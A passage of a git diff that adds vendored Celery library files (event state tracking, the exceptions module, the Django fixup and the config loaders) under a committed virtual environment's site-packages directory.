+ # this state logically happens-before the current state, so merge. + keep = self.merge_rules.get(state) + if keep is not None: + fields = { + k: v for k, v in fields.items() if k in keep + } + else: + fields.update(state=state, timestamp=timestamp) + + # update current state with info from this event. + self.__dict__.update(fields) + + def info(self, fields=None, extra=None): + """Information about this task suitable for on-screen display.""" + extra = [] if not extra else extra + fields = self._info_fields if fields is None else fields + + def _keys(): + for key in list(fields) + list(extra): + value = getattr(self, key, None) + if value is not None: + yield key, value + + return dict(_keys()) + + def __repr__(self): + return R_TASK.format(self) + + def as_dict(self): + get = object.__getattribute__ + handler = self._serializer_handlers.get + return { + k: handler(k, pass1)(get(self, k)) for k in self._fields + } + + def _serializable_children(self, value): + return [task.id for task in self.children] + + def _serializable_root(self, value): + return self.root_id + + def _serializable_parent(self, value): + return self.parent_id + + def __reduce__(self): + return _depickle_task, (self.__class__, self.as_dict()) + + @property + def id(self): + return self.uuid + + @property + def origin(self): + return self.client if self.worker is None else self.worker.id + + @property + def ready(self): + return self.state in states.READY_STATES + + @cached_property + def parent(self): + # issue github.com/mher/flower/issues/648 + try: + return self.parent_id and self.cluster_state.tasks.data[self.parent_id] + except KeyError: + return None + + @cached_property + def root(self): + # issue github.com/mher/flower/issues/648 + try: + return self.root_id and self.cluster_state.tasks.data[self.root_id] + except KeyError: + return None + + +class State: + """Records clusters state.""" + + Worker = Worker + Task = Task + event_count = 0 + task_count = 0 + heap_multiplier = 4 + + def __init__(self, callback=None, + workers=None, tasks=None, taskheap=None, + max_workers_in_memory=5000, max_tasks_in_memory=10000, + on_node_join=None, on_node_leave=None, + tasks_by_type=None, tasks_by_worker=None): + self.event_callback = callback + self.workers = (LRUCache(max_workers_in_memory) + if workers is None else workers) + self.tasks = (LRUCache(max_tasks_in_memory) + if tasks is None else tasks) + self._taskheap = [] if taskheap is None else taskheap + self.max_workers_in_memory = max_workers_in_memory + self.max_tasks_in_memory = max_tasks_in_memory + self.on_node_join = on_node_join + self.on_node_leave = on_node_leave + self._mutex = threading.Lock() + self.handlers = {} + self._seen_types = set() + self._tasks_to_resolve = {} + self.rebuild_taskheap() + + self.tasks_by_type = CallableDefaultdict( + self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]] + self.tasks_by_type.update( + _deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks)) + + self.tasks_by_worker = CallableDefaultdict( + self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]] + self.tasks_by_worker.update( + _deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks)) + + @cached_property + def _event(self): + return self._create_dispatcher() + + def freeze_while(self, fun, *args, **kwargs): + clear_after = kwargs.pop('clear_after', False) + with self._mutex: + try: + return fun(*args, **kwargs) + finally: + if clear_after: + self._clear() + + def clear_tasks(self, ready=True): + with self._mutex: + return self._clear_tasks(ready) + + def _clear_tasks(self, ready: bool = True): + if ready: + in_progress = { + uuid: task for uuid, task in self.itertasks() + if task.state not in states.READY_STATES + } + self.tasks.clear() + self.tasks.update(in_progress) + else: + self.tasks.clear() + self._taskheap[:] = [] + + def _clear(self, ready=True): + self.workers.clear() + self._clear_tasks(ready) + self.event_count = 0 + self.task_count = 0 + + def clear(self, ready: bool = True): + with self._mutex: + return self._clear(ready) + + def get_or_create_worker(self, hostname, **kwargs): + """Get or create worker by hostname. + + Returns: + Tuple: of ``(worker, was_created)`` pairs. + """ + try: + worker = self.workers[hostname] + if kwargs: + worker.update(kwargs) + return worker, False + except KeyError: + worker = self.workers[hostname] = self.Worker( + hostname, **kwargs) + return worker, True + + def get_or_create_task(self, uuid): + """Get or create task by uuid.""" + try: + return self.tasks[uuid], False + except KeyError: + task = self.tasks[uuid] = self.Task(uuid, cluster_state=self) + return task, True + + def event(self, event): + with self._mutex: + return self._event(event) + + def task_event(self, type_, fields): + """Deprecated, use :meth:`event`.""" + return self._event(dict(fields, type='-'.join(['task', type_])))[0] + + def worker_event(self, type_, fields): + """Deprecated, use :meth:`event`.""" + return self._event(dict(fields, type='-'.join(['worker', type_])))[0] + + def _create_dispatcher(self): + + # pylint: disable=too-many-statements + # This code is highly optimized, but not for reusability. + get_handler = self.handlers.__getitem__ + event_callback = self.event_callback + wfields = itemgetter('hostname', 'timestamp', 'local_received') + tfields = itemgetter('uuid', 'hostname', 'timestamp', + 'local_received', 'clock') + taskheap = self._taskheap + th_append = taskheap.append + th_pop = taskheap.pop + # Removing events from task heap is an O(n) operation, + # so easier to just account for the common number of events + # for each task (PENDING->RECEIVED->STARTED->final) + #: an O(n) operation + max_events_in_heap = self.max_tasks_in_memory * self.heap_multiplier + add_type = self._seen_types.add + on_node_join, on_node_leave = self.on_node_join, self.on_node_leave + tasks, Task = self.tasks, self.Task + workers, Worker = self.workers, self.Worker + # avoid updating LRU entry at getitem + get_worker, get_task = workers.data.__getitem__, tasks.data.__getitem__ + + get_task_by_type_set = self.tasks_by_type.__getitem__ + get_task_by_worker_set = self.tasks_by_worker.__getitem__ + + def _event(event, + timetuple=timetuple, KeyError=KeyError, + insort=bisect.insort, created=True): + self.event_count += 1 + if event_callback: + event_callback(self, event) + group, _, subject = event['type'].partition('-') + try: + handler = get_handler(group) + except KeyError: + pass + else: + return handler(subject, event), subject + + if group == 'worker': + try: + hostname, timestamp, local_received = wfields(event) + except KeyError: + pass + else: + is_offline = subject == 'offline' + try: + worker, created = get_worker(hostname), False + except KeyError: + if is_offline: + worker, created = Worker(hostname), False + else: + worker = workers[hostname] = Worker(hostname) + worker.event(subject, timestamp, local_received, event) + if on_node_join and (created or subject == 'online'): + on_node_join(worker) + if on_node_leave and is_offline: + on_node_leave(worker) + workers.pop(hostname, None) + return (worker, created), subject + elif group == 'task': + (uuid, hostname, timestamp, + local_received, clock) = tfields(event) + # task-sent event is sent by client, not worker + is_client_event = subject == 'sent' + try: + task, task_created = get_task(uuid), False + except KeyError: + task = tasks[uuid] = Task(uuid, cluster_state=self) + task_created = True + if is_client_event: + task.client = hostname + else: + try: + worker = get_worker(hostname) + except KeyError: + worker = workers[hostname] = Worker(hostname) + task.worker = worker + if worker is not None and local_received: + worker.event(None, local_received, timestamp) + + origin = hostname if is_client_event else worker.id + + # remove oldest event if exceeding the limit. + heaps = len(taskheap) + if heaps + 1 > max_events_in_heap: + th_pop(0) + + # most events will be dated later than the previous. + timetup = timetuple(clock, timestamp, origin, ref(task)) + if heaps and timetup > taskheap[-1]: + th_append(timetup) + else: + insort(taskheap, timetup) + + if subject == 'received': + self.task_count += 1 + task.event(subject, timestamp, local_received, event) + task_name = task.name + if task_name is not None: + add_type(task_name) + if task_created: # add to tasks_by_type index + get_task_by_type_set(task_name).add(task) + get_task_by_worker_set(hostname).add(task) + if task.parent_id: + try: + parent_task = self.tasks[task.parent_id] + except KeyError: + self._add_pending_task_child(task) + else: + parent_task.children.add(task) + try: + _children = self._tasks_to_resolve.pop(uuid) + except KeyError: + pass + else: + task.children.update(_children) + + return (task, task_created), subject + return _event + + def _add_pending_task_child(self, task): + try: + ch = self._tasks_to_resolve[task.parent_id] + except KeyError: + ch = self._tasks_to_resolve[task.parent_id] = WeakSet() + ch.add(task) + + def rebuild_taskheap(self, timetuple=timetuple): + heap = self._taskheap[:] = [ + timetuple(t.clock, t.timestamp, t.origin, ref(t)) + for t in self.tasks.values() + ] + heap.sort() + + def itertasks(self, limit: Optional[int] = None): + for index, row in enumerate(self.tasks.items()): + yield row + if limit and index + 1 >= limit: + break + + def tasks_by_time(self, limit=None, reverse: bool = True): + """Generator yielding tasks ordered by time. + + Yields: + Tuples of ``(uuid, Task)``. + """ + _heap = self._taskheap + if reverse: + _heap = reversed(_heap) + + seen = set() + for evtup in islice(_heap, 0, limit): + task = evtup[3]() + if task is not None: + uuid = task.uuid + if uuid not in seen: + yield uuid, task + seen.add(uuid) + tasks_by_timestamp = tasks_by_time + + def _tasks_by_type(self, name, limit=None, reverse=True): + """Get all tasks by type. + + This is slower than accessing :attr:`tasks_by_type`, + but will be ordered by time. + + Returns: + Generator: giving ``(uuid, Task)`` pairs. + """ + return islice( + ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) + if task.name == name), + 0, limit, + ) + + def _tasks_by_worker(self, hostname, limit=None, reverse=True): + """Get all tasks by worker. + + Slower than accessing :attr:`tasks_by_worker`, but ordered by time. + """ + return islice( + ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) + if task.worker.hostname == hostname), + 0, limit, + ) + + def task_types(self): + """Return a list of all seen task types.""" + return sorted(self._seen_types) + + def alive_workers(self): + """Return a list of (seemingly) alive workers.""" + return (w for w in self.workers.values() if w.alive) + + def __repr__(self): + return R_STATE.format(self) + + def __reduce__(self): + return self.__class__, ( + self.event_callback, self.workers, self.tasks, None, + self.max_workers_in_memory, self.max_tasks_in_memory, + self.on_node_join, self.on_node_leave, + _serialize_Task_WeakSet_Mapping(self.tasks_by_type), + _serialize_Task_WeakSet_Mapping(self.tasks_by_worker), + ) + + +def _serialize_Task_WeakSet_Mapping(mapping): + return {name: [t.id for t in tasks] for name, tasks in mapping.items()} + + +def _deserialize_Task_WeakSet_Mapping(mapping, tasks): + mapping = mapping or {} + return {name: WeakSet(tasks[i] for i in ids if i in tasks) + for name, ids in mapping.items()} diff --git a/env/Lib/site-packages/celery/exceptions.py b/env/Lib/site-packages/celery/exceptions.py new file mode 100644 index 00000000..3203e9f4 --- /dev/null +++ b/env/Lib/site-packages/celery/exceptions.py @@ -0,0 +1,312 @@ +"""Celery error types. + +Error Hierarchy +=============== + +- :exc:`Exception` + - :exc:`celery.exceptions.CeleryError` + - :exc:`~celery.exceptions.ImproperlyConfigured` + - :exc:`~celery.exceptions.SecurityError` + - :exc:`~celery.exceptions.TaskPredicate` + - :exc:`~celery.exceptions.Ignore` + - :exc:`~celery.exceptions.Reject` + - :exc:`~celery.exceptions.Retry` + - :exc:`~celery.exceptions.TaskError` + - :exc:`~celery.exceptions.QueueNotFound` + - :exc:`~celery.exceptions.IncompleteStream` + - :exc:`~celery.exceptions.NotRegistered` + - :exc:`~celery.exceptions.AlreadyRegistered` + - :exc:`~celery.exceptions.TimeoutError` + - :exc:`~celery.exceptions.MaxRetriesExceededError` + - :exc:`~celery.exceptions.TaskRevokedError` + - :exc:`~celery.exceptions.InvalidTaskError` + - :exc:`~celery.exceptions.ChordError` + - :exc:`~celery.exceptions.BackendError` + - :exc:`~celery.exceptions.BackendGetMetaError` + - :exc:`~celery.exceptions.BackendStoreError` + - :class:`kombu.exceptions.KombuError` + - :exc:`~celery.exceptions.OperationalError` + + Raised when a transport connection error occurs while + sending a message (be it a task, remote control command error). + + .. note:: + This exception does not inherit from + :exc:`~celery.exceptions.CeleryError`. + - **billiard errors** (prefork pool) + - :exc:`~celery.exceptions.SoftTimeLimitExceeded` + - :exc:`~celery.exceptions.TimeLimitExceeded` + - :exc:`~celery.exceptions.WorkerLostError` + - :exc:`~celery.exceptions.Terminated` +- :class:`UserWarning` + - :class:`~celery.exceptions.CeleryWarning` + - :class:`~celery.exceptions.AlwaysEagerIgnored` + - :class:`~celery.exceptions.DuplicateNodenameWarning` + - :class:`~celery.exceptions.FixupWarning` + - :class:`~celery.exceptions.NotConfigured` + - :class:`~celery.exceptions.SecurityWarning` +- :exc:`BaseException` + - :exc:`SystemExit` + - :exc:`~celery.exceptions.WorkerTerminate` + - :exc:`~celery.exceptions.WorkerShutdown` +""" + +import numbers + +from billiard.exceptions import SoftTimeLimitExceeded, Terminated, TimeLimitExceeded, WorkerLostError +from click import ClickException +from kombu.exceptions import OperationalError + +__all__ = ( + 'reraise', + # Warnings + 'CeleryWarning', + 'AlwaysEagerIgnored', 'DuplicateNodenameWarning', + 'FixupWarning', 'NotConfigured', 'SecurityWarning', + + # Core errors + 'CeleryError', + 'ImproperlyConfigured', 'SecurityError', + + # Kombu (messaging) errors. + 'OperationalError', + + # Task semi-predicates + 'TaskPredicate', 'Ignore', 'Reject', 'Retry', + + # Task related errors. + 'TaskError', 'QueueNotFound', 'IncompleteStream', + 'NotRegistered', 'AlreadyRegistered', 'TimeoutError', + 'MaxRetriesExceededError', 'TaskRevokedError', + 'InvalidTaskError', 'ChordError', + + # Backend related errors. + 'BackendError', 'BackendGetMetaError', 'BackendStoreError', + + # Billiard task errors. + 'SoftTimeLimitExceeded', 'TimeLimitExceeded', + 'WorkerLostError', 'Terminated', + + # Deprecation warnings (forcing Python to emit them). + 'CPendingDeprecationWarning', 'CDeprecationWarning', + + # Worker shutdown semi-predicates (inherits from SystemExit). + 'WorkerShutdown', 'WorkerTerminate', + + 'CeleryCommandException', +) + +from celery.utils.serialization import get_pickleable_exception + +UNREGISTERED_FMT = """\ +Task of kind {0} never registered, please make sure it's imported.\ +""" + + +def reraise(tp, value, tb=None): + """Reraise exception.""" + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + + +class CeleryWarning(UserWarning): + """Base class for all Celery warnings.""" + + +class AlwaysEagerIgnored(CeleryWarning): + """send_task ignores :setting:`task_always_eager` option.""" + + +class DuplicateNodenameWarning(CeleryWarning): + """Multiple workers are using the same nodename.""" + + +class FixupWarning(CeleryWarning): + """Fixup related warning.""" + + +class NotConfigured(CeleryWarning): + """Celery hasn't been configured, as no config module has been found.""" + + +class SecurityWarning(CeleryWarning): + """Potential security issue found.""" + + +class CeleryError(Exception): + """Base class for all Celery errors.""" + + +class TaskPredicate(CeleryError): + """Base class for task-related semi-predicates.""" + + +class Retry(TaskPredicate): + """The task is to be retried later.""" + + #: Optional message describing context of retry. + message = None + + #: Exception (if any) that caused the retry to happen. + exc = None + + #: Time of retry (ETA), either :class:`numbers.Real` or + #: :class:`~datetime.datetime`. + when = None + + def __init__(self, message=None, exc=None, when=None, is_eager=False, + sig=None, **kwargs): + from kombu.utils.encoding import safe_repr + self.message = message + if isinstance(exc, str): + self.exc, self.excs = None, exc + else: + self.exc, self.excs = get_pickleable_exception(exc), safe_repr(exc) if exc else None + self.when = when + self.is_eager = is_eager + self.sig = sig + super().__init__(self, exc, when, **kwargs) + + def humanize(self): + if isinstance(self.when, numbers.Number): + return f'in {self.when}s' + return f'at {self.when}' + + def __str__(self): + if self.message: + return self.message + if self.excs: + return f'Retry {self.humanize()}: {self.excs}' + return f'Retry {self.humanize()}' + + def __reduce__(self): + return self.__class__, (self.message, self.exc, self.when) + + +RetryTaskError = Retry # XXX compat + + +class Ignore(TaskPredicate): + """A task can raise this to ignore doing state updates.""" + + +class Reject(TaskPredicate): + """A task can raise this if it wants to reject/re-queue the message.""" + + def __init__(self, reason=None, requeue=False): + self.reason = reason + self.requeue = requeue + super().__init__(reason, requeue) + + def __repr__(self): + return f'reject requeue={self.requeue}: {self.reason}' + + +class ImproperlyConfigured(CeleryError): + """Celery is somehow improperly configured.""" + + +class SecurityError(CeleryError): + """Security related exception.""" + + +class TaskError(CeleryError): + """Task related errors.""" + + +class QueueNotFound(KeyError, TaskError): + """Task routed to a queue not in ``conf.queues``.""" + + +class IncompleteStream(TaskError): + """Found the end of a stream of data, but the data isn't complete.""" + + +class NotRegistered(KeyError, TaskError): + """The task is not registered.""" + + def __repr__(self): + return UNREGISTERED_FMT.format(self) + + +class AlreadyRegistered(TaskError): + """The task is already registered.""" + # XXX Unused + + +class TimeoutError(TaskError): + """The operation timed out.""" + + +class MaxRetriesExceededError(TaskError): + """The tasks max restart limit has been exceeded.""" + + def __init__(self, *args, **kwargs): + self.task_args = kwargs.pop("task_args", []) + self.task_kwargs = kwargs.pop("task_kwargs", dict()) + super().__init__(*args, **kwargs) + + +class TaskRevokedError(TaskError): + """The task has been revoked, so no result available.""" + + +class InvalidTaskError(TaskError): + """The task has invalid data or ain't properly constructed.""" + + +class ChordError(TaskError): + """A task part of the chord raised an exception.""" + + +class CPendingDeprecationWarning(PendingDeprecationWarning): + """Warning of pending deprecation.""" + + +class CDeprecationWarning(DeprecationWarning): + """Warning of deprecation.""" + + +class WorkerTerminate(SystemExit): + """Signals that the worker should terminate immediately.""" + + +SystemTerminate = WorkerTerminate # XXX compat + + +class WorkerShutdown(SystemExit): + """Signals that the worker should perform a warm shutdown.""" + + +class BackendError(Exception): + """An issue writing or reading to/from the backend.""" + + +class BackendGetMetaError(BackendError): + """An issue reading from the backend.""" + + def __init__(self, *args, **kwargs): + self.task_id = kwargs.get('task_id', "") + + def __repr__(self): + return super().__repr__() + " task_id:" + self.task_id + + +class BackendStoreError(BackendError): + """An issue writing to the backend.""" + + def __init__(self, *args, **kwargs): + self.state = kwargs.get('state', "") + self.task_id = kwargs.get('task_id', "") + + def __repr__(self): + return super().__repr__() + " state:" + self.state + " task_id:" + self.task_id + + +class CeleryCommandException(ClickException): + """A general command exception which stores an exit code.""" + + def __init__(self, message, exit_code): + super().__init__(message=message) + self.exit_code = exit_code diff --git a/env/Lib/site-packages/celery/fixups/__init__.py b/env/Lib/site-packages/celery/fixups/__init__.py new file mode 100644 index 00000000..c565ca34 --- /dev/null +++ b/env/Lib/site-packages/celery/fixups/__init__.py @@ -0,0 +1 @@ +"""Fixups.""" diff --git a/env/Lib/site-packages/celery/fixups/django.py b/env/Lib/site-packages/celery/fixups/django.py new file mode 100644 index 00000000..473c3b67 --- /dev/null +++ b/env/Lib/site-packages/celery/fixups/django.py @@ -0,0 +1,213 @@ +"""Django-specific customization.""" +import os +import sys +import warnings +from datetime import datetime +from importlib import import_module +from typing import IO, TYPE_CHECKING, Any, List, Optional, cast + +from kombu.utils.imports import symbol_by_name +from kombu.utils.objects import cached_property + +from celery import _state, signals +from celery.exceptions import FixupWarning, ImproperlyConfigured + +if TYPE_CHECKING: + from types import ModuleType + from typing import Protocol + + from django.db.utils import ConnectionHandler + + from celery.app.base import Celery + from celery.app.task import Task + + class DjangoDBModule(Protocol): + connections: ConnectionHandler + + +__all__ = ('DjangoFixup', 'fixup') + +ERR_NOT_INSTALLED = """\ +Environment variable DJANGO_SETTINGS_MODULE is defined +but Django isn't installed. Won't apply Django fix-ups! +""" + + +def _maybe_close_fd(fh: IO) -> None: + try: + os.close(fh.fileno()) + except (AttributeError, OSError, TypeError): + # TypeError added for celery#962 + pass + + +def _verify_django_version(django: "ModuleType") -> None: + if django.VERSION < (1, 11): + raise ImproperlyConfigured('Celery 5.x requires Django 1.11 or later.') + + +def fixup(app: "Celery", env: str = 'DJANGO_SETTINGS_MODULE') -> Optional["DjangoFixup"]: + """Install Django fixup if settings module environment is set.""" + SETTINGS_MODULE = os.environ.get(env) + if SETTINGS_MODULE and 'django' not in app.loader_cls.lower(): + try: + import django + except ImportError: + warnings.warn(FixupWarning(ERR_NOT_INSTALLED)) + else: + _verify_django_version(django) + return DjangoFixup(app).install() + return None + + +class DjangoFixup: + """Fixup installed when using Django.""" + + def __init__(self, app: "Celery"): + self.app = app + if _state.default_app is None: + self.app.set_default() + self._worker_fixup: Optional["DjangoWorkerFixup"] = None + + def install(self) -> "DjangoFixup": + # Need to add project directory to path. + # The project directory has precedence over system modules, + # so we prepend it to the path. + sys.path.insert(0, os.getcwd()) + + self._settings = symbol_by_name('django.conf:settings') + self.app.loader.now = self.now + + signals.import_modules.connect(self.on_import_modules) + signals.worker_init.connect(self.on_worker_init) + return self + + @property + def worker_fixup(self) -> "DjangoWorkerFixup": + if self._worker_fixup is None: + self._worker_fixup = DjangoWorkerFixup(self.app) + return self._worker_fixup + + @worker_fixup.setter + def worker_fixup(self, value: "DjangoWorkerFixup") -> None: + self._worker_fixup = value + + def on_import_modules(self, **kwargs: Any) -> None: + # call django.setup() before task modules are imported + self.worker_fixup.validate_models() + + def on_worker_init(self, **kwargs: Any) -> None: + self.worker_fixup.install() + + def now(self, utc: bool = False) -> datetime: + return datetime.utcnow() if utc else self._now() + + def autodiscover_tasks(self) -> List[str]: + from django.apps import apps + return [config.name for config in apps.get_app_configs()] + + @cached_property + def _now(self) -> datetime: + return symbol_by_name('django.utils.timezone:now') + + +class DjangoWorkerFixup: + _db_recycles = 0 + + def __init__(self, app: "Celery") -> None: + self.app = app + self.db_reuse_max = self.app.conf.get('CELERY_DB_REUSE_MAX', None) + self._db = cast("DjangoDBModule", import_module('django.db')) + self._cache = import_module('django.core.cache') + self._settings = symbol_by_name('django.conf:settings') + + self.interface_errors = ( + symbol_by_name('django.db.utils.InterfaceError'), + ) + self.DatabaseError = symbol_by_name('django.db:DatabaseError') + + def django_setup(self) -> None: + import django + django.setup() + + def validate_models(self) -> None: + from django.core.checks import run_checks + self.django_setup() + if not os.environ.get('CELERY_SKIP_CHECKS'): + run_checks() + + def install(self) -> "DjangoWorkerFixup": + signals.beat_embedded_init.connect(self.close_database) + signals.task_prerun.connect(self.on_task_prerun) + signals.task_postrun.connect(self.on_task_postrun) + signals.worker_process_init.connect(self.on_worker_process_init) + self.close_database() + self.close_cache() + return self + + def on_worker_process_init(self, **kwargs: Any) -> None: + # Child process must validate models again if on Windows, + # or if they were started using execv. + if os.environ.get('FORKED_BY_MULTIPROCESSING'): + self.validate_models() + + # close connections: + # the parent process may have established these, + # so need to close them. + + # calling db.close() on some DB connections will cause + # the inherited DB conn to also get broken in the parent + # process so we need to remove it without triggering any + # network IO that close() might cause. + for c in self._db.connections.all(): + if c and c.connection: + self._maybe_close_db_fd(c.connection) + + # use the _ version to avoid DB_REUSE preventing the conn.close() call + self._close_database(force=True) + self.close_cache() + + def _maybe_close_db_fd(self, fd: IO) -> None: + try: + _maybe_close_fd(fd) + except self.interface_errors: + pass + + def on_task_prerun(self, sender: "Task", **kwargs: Any) -> None: + """Called before every task.""" + if not getattr(sender.request, 'is_eager', False): + self.close_database() + + def on_task_postrun(self, sender: "Task", **kwargs: Any) -> None: + # See https://groups.google.com/group/django-users/browse_thread/thread/78200863d0c07c6d/ + if not getattr(sender.request, 'is_eager', False): + self.close_database() + self.close_cache() + + def close_database(self, **kwargs: Any) -> None: + if not self.db_reuse_max: + return self._close_database() + if self._db_recycles >= self.db_reuse_max * 2: + self._db_recycles = 0 + self._close_database() + self._db_recycles += 1 + + def _close_database(self, force: bool = False) -> None: + for conn in self._db.connections.all(): + try: + if force: + conn.close() + else: + conn.close_if_unusable_or_obsolete() + except self.interface_errors: + pass + except self.DatabaseError as exc: + str_exc = str(exc) + if 'closed' not in str_exc and 'not connected' not in str_exc: + raise + + def close_cache(self) -> None: + try: + self._cache.close_caches() + except (TypeError, AttributeError): + pass diff --git a/env/Lib/site-packages/celery/loaders/__init__.py b/env/Lib/site-packages/celery/loaders/__init__.py new file mode 100644 index 00000000..730a1fa2 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/__init__.py @@ -0,0 +1,18 @@ +"""Get loader by name. + +Loaders define how configuration is read, what happens +when workers start, when tasks are executed and so on. +""" +from celery.utils.imports import import_from_cwd, symbol_by_name + +__all__ = ('get_loader_cls',) + +LOADER_ALIASES = { + 'app': 'celery.loaders.app:AppLoader', + 'default': 'celery.loaders.default:Loader', +} + + +def get_loader_cls(loader): + """Get loader class by name/alias.""" + return symbol_by_name(loader, LOADER_ALIASES, imp=import_from_cwd) diff --git a/env/Lib/site-packages/celery/loaders/app.py b/env/Lib/site-packages/celery/loaders/app.py new file mode 100644 index 00000000..c9784c50 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/app.py @@ -0,0 +1,8 @@ +"""The default loader used with custom app instances.""" +from .base import BaseLoader + +__all__ = ('AppLoader',) + + +class AppLoader(BaseLoader): + """Default loader used when an app is specified.""" diff --git a/env/Lib/site-packages/celery/loaders/base.py b/env/Lib/site-packages/celery/loaders/base.py new file mode 100644 index 00000000..aa7139c7 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/base.py @@ -0,0 +1,272 @@ +"""Loader base class.""" +import importlib +import os +import re +import sys +from datetime import datetime + +from kombu.utils import json +from kombu.utils.objects import cached_property + +from celery import signals +from celery.exceptions import reraise +from celery.utils.collections import DictAttribute, force_mapping +from celery.utils.functional import maybe_list +from celery.utils.imports import NotAPackage, find_module, import_from_cwd, symbol_by_name + +__all__ = ('BaseLoader',) + +_RACE_PROTECTION = False + +CONFIG_INVALID_NAME = """\ +Error: Module '{module}' doesn't exist, or it's not a valid \ +Python module name. +""" + +CONFIG_WITH_SUFFIX = CONFIG_INVALID_NAME + """\ +Did you mean '{suggest}'? +""" + +unconfigured = object() + + +class BaseLoader: + """Base class for loaders. + + Loaders handles, + + * Reading celery client/worker configurations. + + * What happens when a task starts? + See :meth:`on_task_init`. + + * What happens when the worker starts? + See :meth:`on_worker_init`. + + * What happens when the worker shuts down? + See :meth:`on_worker_shutdown`. + + * What modules are imported to find tasks? + """ + + builtin_modules = frozenset() + configured = False + override_backends = {} + worker_initialized = False + + _conf = unconfigured + + def __init__(self, app, **kwargs): + self.app = app + self.task_modules = set() + + def now(self, utc=True): + if utc: + return datetime.utcnow() + return datetime.now() + + def on_task_init(self, task_id, task): + """Called before a task is executed.""" + + def on_process_cleanup(self): + """Called after a task is executed.""" + + def on_worker_init(self): + """Called when the worker (:program:`celery worker`) starts.""" + + def on_worker_shutdown(self): + """Called when the worker (:program:`celery worker`) shuts down.""" + + def on_worker_process_init(self): + """Called when a child process starts.""" + + def import_task_module(self, module): + self.task_modules.add(module) + return self.import_from_cwd(module) + + def import_module(self, module, package=None): + return importlib.import_module(module, package=package) + + def import_from_cwd(self, module, imp=None, package=None): + return import_from_cwd( + module, + self.import_module if imp is None else imp, + package=package, + ) + + def import_default_modules(self): + responses = signals.import_modules.send(sender=self.app) + # Prior to this point loggers are not yet set up properly, need to + # check responses manually and reraised exceptions if any, otherwise + # they'll be silenced, making it incredibly difficult to debug. + for _, response in responses: + if isinstance(response, Exception): + raise response + return [self.import_task_module(m) for m in self.default_modules] + + def init_worker(self): + if not self.worker_initialized: + self.worker_initialized = True + self.import_default_modules() + self.on_worker_init() + + def shutdown_worker(self): + self.on_worker_shutdown() + + def init_worker_process(self): + self.on_worker_process_init() + + def config_from_object(self, obj, silent=False): + if isinstance(obj, str): + try: + obj = self._smart_import(obj, imp=self.import_from_cwd) + except (ImportError, AttributeError): + if silent: + return False + raise + self._conf = force_mapping(obj) + if self._conf.get('override_backends') is not None: + self.override_backends = self._conf['override_backends'] + return True + + def _smart_import(self, path, imp=None): + imp = self.import_module if imp is None else imp + if ':' in path: + # Path includes attribute so can just jump + # here (e.g., ``os.path:abspath``). + return symbol_by_name(path, imp=imp) + + # Not sure if path is just a module name or if it includes an + # attribute name (e.g., ``os.path``, vs, ``os.path.abspath``). + try: + return imp(path) + except ImportError: + # Not a module name, so try module + attribute. + return symbol_by_name(path, imp=imp) + + def _import_config_module(self, name): + try: + self.find_module(name) + except NotAPackage as exc: + if name.endswith('.py'): + reraise(NotAPackage, NotAPackage(CONFIG_WITH_SUFFIX.format( + module=name, suggest=name[:-3])), sys.exc_info()[2]) + raise NotAPackage(CONFIG_INVALID_NAME.format(module=name)) from exc + else: + return self.import_from_cwd(name) + + def find_module(self, module): + return find_module(module) + + def cmdline_config_parser(self, args, namespace='celery', + re_type=re.compile(r'\((\w+)\)'), + extra_types=None, + override_types=None): + extra_types = extra_types if extra_types else {'json': json.loads} + override_types = override_types if override_types else { + 'tuple': 'json', + 'list': 'json', + 'dict': 'json' + } + from celery.app.defaults import NAMESPACES, Option + namespace = namespace and namespace.lower() + typemap = dict(Option.typemap, **extra_types) + + def getarg(arg): + """Parse single configuration from command-line.""" + # ## find key/value + # ns.key=value|ns_key=value (case insensitive) + key, value = arg.split('=', 1) + key = key.lower().replace('.', '_') + + # ## find name-space. + # .key=value|_key=value expands to default name-space. + if key[0] == '_': + ns, key = namespace, key[1:] + else: + # find name-space part of key + ns, key = key.split('_', 1) + + ns_key = (ns and ns + '_' or '') + key + + # (type)value makes cast to custom type. + cast = re_type.match(value) + if cast: + type_ = cast.groups()[0] + type_ = override_types.get(type_, type_) + value = value[len(cast.group()):] + value = typemap[type_](value) + else: + try: + value = NAMESPACES[ns.lower()][key].to_python(value) + except ValueError as exc: + # display key name in error message. + raise ValueError(f'{ns_key!r}: {exc}') + return ns_key, value + return dict(getarg(arg) for arg in args) + + def read_configuration(self, env='CELERY_CONFIG_MODULE'): + try: + custom_config = os.environ[env] + except KeyError: + pass + else: + if custom_config: + usercfg = self._import_config_module(custom_config) + return DictAttribute(usercfg) + + def autodiscover_tasks(self, packages, related_name='tasks'): + self.task_modules.update( + mod.__name__ for mod in autodiscover_tasks(packages or (), + related_name) if mod) + + @cached_property + def default_modules(self): + return ( + tuple(self.builtin_modules) + + tuple(maybe_list(self.app.conf.imports)) + + tuple(maybe_list(self.app.conf.include)) + ) + + @property + def conf(self): + """Loader configuration.""" + if self._conf is unconfigured: + self._conf = self.read_configuration() + return self._conf + + +def autodiscover_tasks(packages, related_name='tasks'): + global _RACE_PROTECTION + + if _RACE_PROTECTION: + return () + _RACE_PROTECTION = True + try: + return [find_related_module(pkg, related_name) for pkg in packages] + finally: + _RACE_PROTECTION = False + + +def find_related_module(package, related_name): + """Find module in package.""" + # Django 1.7 allows for specifying a class name in INSTALLED_APPS. + # (Issue #2248). + try: + module = importlib.import_module(package) + if not related_name and module: + return module + except ImportError: + package, _, _ = package.rpartition('.') + if not package: + raise + + module_name = f'{package}.{related_name}' + + try: + return importlib.import_module(module_name) + except ImportError as e: + import_exc_name = getattr(e, 'name', module_name) + if import_exc_name is not None and import_exc_name != module_name: + raise e + return diff --git a/env/Lib/site-packages/celery/loaders/default.py b/env/Lib/site-packages/celery/loaders/default.py new file mode 100644 index 00000000..b49634c2 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/default.py @@ -0,0 +1,42 @@ +"""The default loader used when no custom app has been initialized.""" +import os +import warnings + +from celery.exceptions import NotConfigured +from celery.utils.collections import DictAttribute +from celery.utils.serialization import strtobool + +from .base import BaseLoader + +__all__ = ('Loader', 